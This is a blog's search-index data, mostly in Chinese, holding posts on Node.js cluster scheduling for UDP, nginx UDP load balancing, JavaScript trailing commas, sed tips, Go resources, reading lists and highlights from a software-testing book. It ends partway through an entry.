{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205010,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205093,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 为什么会这样?看看cluster模块的代码 lib/cluster.js lib/cluster.js cluster除去注释,代码仅有两行 \u0026#39;use strict\u0026#39;; // 根据环境变量中是否有NODE_UNIQUE_ID来判断当前进程是主进程还是子进程 const childOrPrimary = \u0026#39;NODE_UNIQUE_ID\u0026#39; in process.env ? \u0026#39;child\u0026#39; : \u0026#39;primary\u0026#39;; // 根据进程类型不同,加载的文件也不同 // 对于主进程,则加载 internal/cluster/primary // 对于自进程,则加载 internal/cluster/child module.exports = require(`internal/cluster/${childOrPrimary}`); internal/cluster/primary.js 轮询策略的种类 通过阅读源码,我们可以获取到以下结论:\ncluster模块实际上是一个事件发射器 cluster模块有两种负载均衡方式 SCHED_NONE 由操作系统决定 SCHED_RR 轮询的方式 const { ArrayPrototypePush, ArrayPrototypeSlice, ArrayPrototypeSome, ObjectKeys, ObjectValues, RegExpPrototypeTest, SafeMap, StringPrototypeStartsWith, } = primordials; const assert = require(\u0026#39;internal/assert\u0026#39;); const { fork } = require(\u0026#39;child_process\u0026#39;); const path = require(\u0026#39;path\u0026#39;); const EventEmitter = require(\u0026#39;events\u0026#39;); const RoundRobinHandle = require(\u0026#39;internal/cluster/round_robin_handle\u0026#39;); const SharedHandle = require(\u0026#39;internal/cluster/shared_handle\u0026#39;); const Worker = require(\u0026#39;internal/cluster/worker\u0026#39;); const { internal, sendHelper } = require(\u0026#39;internal/cluster/utils\u0026#39;); const cluster = new EventEmitter(); const intercom = new EventEmitter(); const SCHED_NONE = 1; const SCHED_RR = 2; const minPort = 1024; const maxPort = 65535; const { validatePort } = require(\u0026#39;internal/validators\u0026#39;); module.exports = cluster; const handles = new SafeMap(); cluster.isWorker = false; cluster.isMaster = true; // Deprecated alias. Must be same as isPrimary. cluster.isPrimary = true; cluster.Worker = Worker; cluster.workers = {}; cluster.settings = {}; cluster.SCHED_NONE = SCHED_NONE; // Leave it to the operating system. cluster.SCHED_RR = SCHED_RR; // Primary distributes connections. 轮询策略如何选择 接下来,我们就要再看看,两种不同的负载策略是如何选择的?\n负载策略刚开始来自NODE_CLUSTER_SCHED_POLICY这个环境变量 这个环境变量有两个值 rr和none 但是如果系统平台是win32, 也就是windows的情况下,则不会使用轮训的负载方式 除此以外,默认将会使用轮训的负载方式 // XXX(bnoordhuis) Fold cluster.schedulingPolicy into cluster.settings? let schedulingPolicy = process.env.NODE_CLUSTER_SCHED_POLICY; if (schedulingPolicy === \u0026#39;rr\u0026#39;) schedulingPolicy = SCHED_RR; else if (schedulingPolicy === \u0026#39;none\u0026#39;) schedulingPolicy = SCHED_NONE; else if (process.platform === \u0026#39;win32\u0026#39;) { // Round-robin doesn\u0026#39;t perform well on // Windows due to the way IOCP is wired up. schedulingPolicy = SCHED_NONE; } else schedulingPolicy = SCHED_RR; cluster.schedulingPolicy = schedulingPolicy; 那么,为什么udp的多进程服务器,并没有做到轮询的负载呢?\n轮询策略的使用 即使调用策略是轮询的方式,如果socker是udp的,也不会用轮训的方式去处理,而用SharedHandle去处理 注释里面写,udp使用轮询的方式是无意义的,这点我不太理解 // UDP is exempt from round-robin connection balancing for what should // be obvious reasons: it\u0026#39;s connectionless. There is nothing to send to // the workers except raw datagrams and that\u0026#39;s pointless. if (schedulingPolicy !== SCHED_RR || message.addressType === \u0026#39;udp4\u0026#39; || message.addressType === \u0026#39;udp6\u0026#39;) { handle = new SharedHandle(key, address, message); } else { handle = new RoundRobinHandle(key, address, message); } ","permalink":"https://wdd.js.org/posts/2021/07/tniabf/","summary":"本来我的目的是使用cluster模块的fork出多个进程,让各个进程都能处理udp消息的。但是最终测试发现,实际上仅有一个进程处理了绝大数消息,其他的进程,要么不处理消息,要么处理的非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 ${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.","title":"udp cluster 多进程调度策略学习"},{"content":"在线书籍 《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","permalink":"https://wdd.js.org/golang/learn-material/","summary":"在线书籍 《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","title":"Golang学习资料"},{"content":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used. The number serves as a hint for session termination. By default, the number of datagrams is not limited. If zero value is specified, no response is expected. However, if a response is received and the session is still not finished, the response will be handled.\n我能用HAProxy吗? 答: HAProxy不支持udp Proxy,你不能用\nHAProxy is a free, very fast and reliable solution offering high availability, load balancing, and proxying for TCP and HTTP-based applications\n参考 http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_responses https://stackoverflow.com/questions/31255780/udp-traffic-with-iperf-for-haproxy ","permalink":"https://wdd.js.org/posts/2021/07/tom7mv/","summary":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used.","title":"使用nginx为udp服务负载均衡"},{"content":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报错语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许再一些场景下,允许再尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们再新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经全满支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].lenght // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Trailing_commas ","permalink":"https://wdd.js.org/fe/js-trailing-commas/","summary":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报错语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许再一些场景下,允许再尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们再新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经全满支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].lenght // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.","title":"Js Trailing Commas"},{"content":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","permalink":"https://wdd.js.org/posts/2021/07/ou9o92/","summary":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","title":"7月书单"},{"content":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转译/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. https://www.gnu.org/software/sed/manual/sed.html\n# 可以用#来替代/ sed \u0026#39;s#ABC#de/#g\u0026#39; some.txt # 也可以用?来替代/ sed \u0026#39;s?ABC?de#?g\u0026#39; some.txt 替代的目标中包含变量 # 注意这里用的是双引号,内部的变量会被转义 sed \u0026#34;s#ABC#${TODAY}#g\u0026#34; some.txt 参考 https://www.gnu.org/software/sed/manual/sed.html ","permalink":"https://wdd.js.org/shell/sed-tips/","summary":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转译/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. https://www.gnu.org/software/sed/manual/sed.html","title":"sed替换"},{"content":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.1.3 项目的早期阶段 \u0026gt; 位置 908一个产品如果在概念上还没有完全确定成型时就去关心质量,这就是优先级混乱的表现。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1398每个测试和其他测试之间都是独立的,使它们就能够以任意顺序来执行。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1399测试不做任何数据持久化方面的工作。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1400在这些测试用例离开测试环境的时候,要保证测试环境的状态与测试用例开始执行之前的状态是一样的。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1404总之,“任意顺序”意味着可以并发执行用例。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1650在一些棘手的编码问题或功能的正确性上浪费时间,不如考核他们是如何看待编码和质量的。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1727测试不应是被要求了才去做的事情。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1728程序的稳定性和韧性比功能正确要重要的多。标注(黄色) - 2.4 与工具开发工程师Ted Mao的访谈 \u0026gt; 位置 1796要允许他们使用你无法预料的方式来使用你的工具。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1845我使用了一个被称为 DDD(译注: defect-driven development)的流程,缺陷驱动开发。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1859Chrome在使用 PyAuto,第3章 测试工程师标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1879我们说 TE是一种“用户开发者( user-developer)”,这不是一个容易理解的概念。标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1880对于编码的敬意是公司文化中相当重要的一点。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1903在研发的早期阶段,功能还在不断变化,最终功能列表和范畴还没有确定, TE通常没有太多的工作可做。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1904给一个项目配备多少测试人员,取决于项目风险和投资回报率。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1906我们需要在正确的时间,投入正确数量的 TE,并带来足够的价值。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1908当前软件的薄弱点在哪里?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1909有没有安全、隐私、性能、可靠性、可用性、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1910主要用户场景是否功能正常?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1911当发生问题的时候,是否容易诊断问题所在?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1914TE的根本使命是保护用户和业务的利益,使之不受到糟糕的设计、令人困惑的用户体验、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1921TE擅长发现需求中的模糊之处,标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1924TE通常是团队里最出名的人,因为他们需要与各种角色标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1938下面是我们关于 TE职责的一般性描述。测试计划和风险分析。评审需求、设计、代码和测试。探索式测试。用户场景。编写测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1949如果软件深受人们喜爱,大家就会认为测试所作所为是理所应当的;如果软件很糟糕,人们可能就会质疑测试工作。笔记 - 3.2.1 测试计划 \u0026gt; 位置 1950测试背锅标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1990读者可以用“ Google Test Analytics”关键词搜索到这个工具。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1991避免散漫的文字,推荐使用简明的列表。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1993不必推销。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1995简洁。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1996不要把不重要的、无法执行的东西放进测试标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1998渐进式的描述( Make it flow)。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2001最终结果应该是测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20091. A代表特质( Attribute)标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2010在开始测试计划或做 ACC分析的时候,必须先确定该产品对用户、对业务的意义。我们为什么要开发这个东西呢?它能带来什么核心价值?它又靠什么来吸引用户?记住,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20462. C代表组件( component)组件是系统的名词,在特质被识别之后确定。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2049组件是构成待建系统的模块,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20633. C代表能力( capability)能力是系统的动词,代表着系统在用户指令之下完成的动作。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2095能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2098能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2100一个能力可以描述任意数量的用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2130用一系列能力来描述用户故事,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2142确定 Google +的特质、组件和能力。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2193风险无处不在——标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2202确定风险的过程称为风险分析。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 22021.风险分析标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2204这些事件发生的可能性有多大?一旦发生,对公司产生多大影响?一旦发生,对客户产生多大影响?产品具备什么缓解措施?标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2206这些缓解措施有多大可能会失败?处理这些失败的成本有哪些?恢复过程有多困难?事件是一次性问题,还是会再次发生?影响标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2209在 Google,我们确定了两个要素:失败频率( frequency of failure)和影响( impact)。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2214风险发生频率有 4个预定义值。罕见(标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2217少见( seldom):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2221偶尔( occasionally):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2225常见( often):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2229测试人员确定每个能力的故障发生频率。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2230估计风险影响的方法大致相同,也是从几种偶数取值中选标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2231最小( minimal):用户甚至不会注意到的问题。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2234一些( some):可能会打扰到用户的问题。一旦发生,重试或恢复标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2237较大( considerable):故障导致标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2240最大( maximal):发生的故障会永久性的损害产品的声誉,并导致用户不再使用它。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2267风险不大可能彻底消除。驾驶有风险,但我们仍然会开车出行;旅游有风险,但我们并没有停止旅游。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2285在软件开发中,任何一种可以在 10分钟之内完成的事情都是微不足道的,或是本来就不值得做的。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2323风险分析是一个独立的领域,在许多其他行业里被严肃地对待。我们现在采用的是一个轻量级的版本,标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2325风险管理方法),这可以作为进一步学习这一重要课题的起点。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2328TE有责任理解所有的风险点,并使用他或她可以利用的任何手段予以缓解。标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2668他们只是在试图破坏软件,还是同时在验证它能正常工作?标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2717我们需要的是愿意持续学习和成长的人。我们也需要那些带来新鲜思想和经验的人,标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3301对于一个新项目,我首先要站在用户的角度了解这个产品。有可能的话,我会作为一个用户,以自己的账户和个人数据去使用产品。我努力使自己经历完整的用户体验。一旦有自己的真实数据在里面,你对一个产品的期待会彻底改变。在具备了用户心态之后,我会做下面的一些事情。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3362遗漏到客户的 bug是一项重要指标,我希望这个数字接近 0。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3377或者用户场景无需编写、自动到位。 CRUD操作(译注: create、 read、 update、 delete)标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3385团队在推出一个产品或新功能时难免感到提心吊胆,而我能带给他们镇定和信心,这使我感到自己是一种正面、有益的力量。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3416而 Google的 SET必须写代码,这是他们的工作。这里也很难找到不会写代码的 TE。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3426Google的测试与其他公司的相同之处呢? Apple:在测试上难以自动化的软件,很难成为好的软件。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3493不管是测试框架还是测试用例都以简单为要,随着项目的开展再迭代的设计。不要试图事先解决所有问题。要敢于扔掉过时的东西。第4章 测试工程经理标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 3989把测试推向上游,让整个团队(开发 +测试)为交付的质量负责。标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 4025从那以后,我们把配置变更也纳入质量流程中,我们开发了一套自动化测试,每次数据和配置变更时都要执行。标注(黄色) - 4.11 工程经理Brad Green访谈 \u0026gt; 位置 4219Google聘用的都是有极端自我驱动力的家伙。“标注(黄色) - 4.12 James Whittaker访谈 \u0026gt; 位置 4339先虚心学习,再在一线作出成绩,然后开始寻求创新的方法。第5章 Google软件测试改进标注(黄色) - 位置 4398Google的测试流程可以非常简练地概括为:标注(黄色) - 位置 4398让每个工程师都注重质量。标注(黄色) - 位置 4398只要大家诚实认真地这么做,质量就会提高。代码质量从一开始就能更好,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4408可是测试并不能保证质量。质量是内建的,而不是外加的。因此,保证质量是开发者的任务,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4409测试成了开发的拐杖。我们越不让开发考虑测试的问题,把测试变得越简单,开发就越来越不会去做测试。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4415保证质量不但是别人的问题,它甚至还属于另一个部门。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4416出问题的时候也很容易就把责任推卸给修前草坪的外包公司。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4426第三个致命的缺陷,是测试人员往往崇拜测试产物( test artifact)胜过软件本身。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4430所有测试产物的价值,在于它们对代码的影响,进而通过产品来体现。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 4447简单来说,我们认为 SET没有未来。 SET就是开发。就这么简单。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 4450SET直接负责很多功能特性,如可测试性、可靠性、可调试性,\n","permalink":"https://wdd.js.org/posts/2021/07/yh8ulq/","summary":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.","title":"Google软件测试之道(异步图书) James Whittaker; Jason Arbon; Jeff Carollo"},{"content":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 